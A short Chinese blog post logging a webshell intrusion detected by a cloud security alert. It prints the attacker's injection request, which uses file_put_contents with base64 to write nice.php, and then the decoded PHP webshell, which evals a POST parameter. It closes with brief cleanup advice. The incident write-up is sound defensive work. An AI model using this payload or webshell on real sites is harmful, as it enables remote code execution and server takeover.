zoukankan      html  css  js  c++  java
  • 记录一次Webshell后门植入

    告警原因:外部入侵
    详情:WebShell告警通常是因为Web应用服务存在漏洞被攻击者利用后植入了恶意文件。
    建议:建议您采取如下措施处理该告警:1. 确认该文件是否是恶意文件; 2. 清除主机上的其他WebShell文件;3. 修复Web应用存在的弱点或漏洞,
    避免再次被入侵; 4. 评估入侵事件的影响,采取进一步的调查和补救措施。
    *这个是阿里云的云安全中心提示的 我个小菜鸡怎么会发现后门呢 o(* ̄︶ ̄*)o

    后门语句:

    [ 2021-07-21T02:56:30+08:00 ] 136.144.41.223 GET //index.php?m=--><?=file_put_contents('nice.php',base64_decode("

    PD9waHAKY2xhc3MgeHsKICAgIHB1YmxpYyBmdW5jdGlvbiBpcCgpewogICAgICAgICRjPSAiICRfUE9TVFtuaWNlXSI7C

    iAgICAgICAgcmV0dXJuICRjOwogICAgfQp9CiRjID0gbmV3IHgoKTsKJGIgPSAkYyAtPiBpcCgpOwpldmFsKCRiKTsKcHJp

    bnQobWQ1KCJSaW5nbyIpKTsKPz4="));?>

    解析:

    #在指定文件下添加内容

    file_put_contents()

    #解码base64

    base64_decode()

    #要添加内容的文件

    nice.php

    #添加的内容

    PD9waHAKY2xhc3MgeHsKICAgIHB1YmxpYyBmdW5jdGlvbiBpcCgpewogICAgICAgICRjPSAiICRfUE9TVFtuaWNlXSI7C

    iAgICAgICAgcmV0dXJuICRjOwogICAgfQp9CiRjID0gbmV3IHgoKTsKJGIgPSAkYyAtPiBpcCgpOwpldmFsKCRiKTsKcHJp

    bnQobWQ1KCJSaW5nbyIpKTsKPz4=

    #解码后的添加内容

    <?php
      class x{
        public function ip(){
          $c= " $_POST[nice]";
          return $c;
        }
      }
      $c = new x();
      $b = $c -> ip();
      eval($b);
      print(md5("Ringo"));
    ?>

    大概意思就是在nice.php文件中添加上方代码  

    处理方案:

    扫出nice.php文件  替换或者删除 

    屏蔽eval()函数

  • 相关阅读:
    SQL Server数据库开发基础
    C#面向对象的概念 ----继承,里氏转换和几种集合(2)
    C#面向对象的概念 ----继承,里氏转换和几种集合(1)
    C#面向对象的概念
    C#的引用类型及stringbuilder类(增补)
    C#方法构建的简单介绍
    C#的结构和数组
    C#debug技巧和反编译器
    C#的语法----程序结构(6)
    C#的语法----程序结构(5)
  • 原文地址:https://www.cnblogs.com/caopeng/p/15069423.html
Copyright © 2011-2022 走看看